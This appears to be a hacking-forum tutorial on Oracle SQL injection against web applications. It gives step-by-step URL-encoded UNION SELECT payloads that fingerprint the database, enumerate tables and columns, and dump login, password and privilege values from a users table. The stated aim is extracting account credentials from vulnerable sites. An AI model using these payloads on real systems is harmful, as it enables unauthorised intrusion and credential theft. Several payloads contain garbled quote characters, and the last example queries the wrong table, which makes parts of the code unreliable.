Hello and welcome to a Oracle SQL injection tutorial. First you need to know that injecting into to Oracle databases is not much different then injecting into others. The only differences are the syntax and different filenames etc... Ok, if you know a site the is vulnerable to some sort of SQLi but, you don't know what database it is, try the following code to check for a Oracle DB.

Code:

https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL%
20from%20dual--

If it is a Oracle DB you should get a error like:

Code:

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result
columns

Now to find the amount of columns in the DB you will keep adding NULL data until you no longer receive and error.

Code:

https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,NULL,NULL,NULL%
20from%20dual--

Now that you have the number of columns you can proceed to extract data from the DB. In this guide I will only show how to extract the account info but, other info can be extracted as well.

Now we try to find which column uses "string" data type. To do this we replace the first "NULL" with 'a'. If you receive an error replace the 'a' with Null and try the next "NULL". An example of this is:

Code:

https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,'a','a',NULL%
20from%20dual--

Once you find the columns that use string data types you can start to search for the names of the tables containing useful info. To do this we use the "user_objects" table.We also use the "object_name" and "object_type" table names to show what the names and types of tables are that are specified as user data (Credentials). A example of the following would be like so:

Code:

https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,
object_name,object_type,NULL%20from%20user_objects--

As you can see, we use the columns that use string data to show object_name and object_type.


Tip: You can also use the all_user_objects table instead of user_objects. This will show all info seen by the user even if the user does not owned it.

We should now see many different table names and types. If you don't, and you get and error, try removing NULL values and finding the columns that use string data type.

In my example lets just say we found a table called USERS. We will attempt to find the names of the column inside this table by using the user_tab_columns table like so:

Code:

https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,
column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%
3d%20Â’USERSÂ’--

Note: %3d is a URL encoded = and %20 is a URL encode whitespace (spacebar).

Now lets say we get login, password, and priviledge columns. We can query these by using the following code:

Code:

https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,
login,password,priviledge%20from%20users--

You should get the login username, password, and priviledge level!

Tip: If there is only one column that uses string data type then you can concatenate multiple columns like so:

Code:

https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,
login||Â’:Â’||password||Â’:Â’||priviledge,NULL,NULL%20from%20user_objects--

This is just like the concat command in MySQL.

Tip: If you want to perfect your oracle injection knowledge I recommend getting some e-books on oracle and installing oracle on your localhost. This way you can practice on your DB.

Hope you enjoyed the tutorial. Please leave feedback and suggestions of future tutorials. Thanks for reading.